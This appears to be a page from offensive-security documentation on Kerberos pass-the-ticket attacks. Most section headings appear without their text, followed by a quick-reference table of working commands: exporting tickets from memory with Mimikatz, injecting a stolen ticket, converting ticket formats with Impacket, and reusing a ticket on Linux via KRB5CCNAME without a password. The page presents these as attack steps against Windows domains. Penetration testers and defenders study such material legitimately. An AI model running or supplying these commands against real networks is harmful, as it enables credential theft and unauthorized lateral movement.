Documentation Index
Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
Use this file to discover all available pages before exploring further.
Overview
Inject stolen Kerberos ticket (TGT or TGS) into session. No password or hash needed — just the ticket.Export Tickets — Mimikatz
.kirbi files in current directory.
Export Tickets — Rubeus
Inject Ticket — Mimikatz
Inject Ticket — Rubeus
Linux — .ccache Files
Convert .kirbi to .ccache
Convert .ccache to .kirbi
Use .ccache
Steal Tickets from Linux
CrackMapExec with Ticket
Quick Reference
| Task | Command |
|---|---|
| Export | mimikatz # sekurlsa::tickets /export |
| Inject (Win) | mimikatz # kerberos::ptt ticket.kirbi |
| Convert | impacket-ticketConverter file.kirbi file.ccache |
| Use (Linux) | export KRB5CCNAME=file.ccache → -k -no-pass |
| Verify | klist |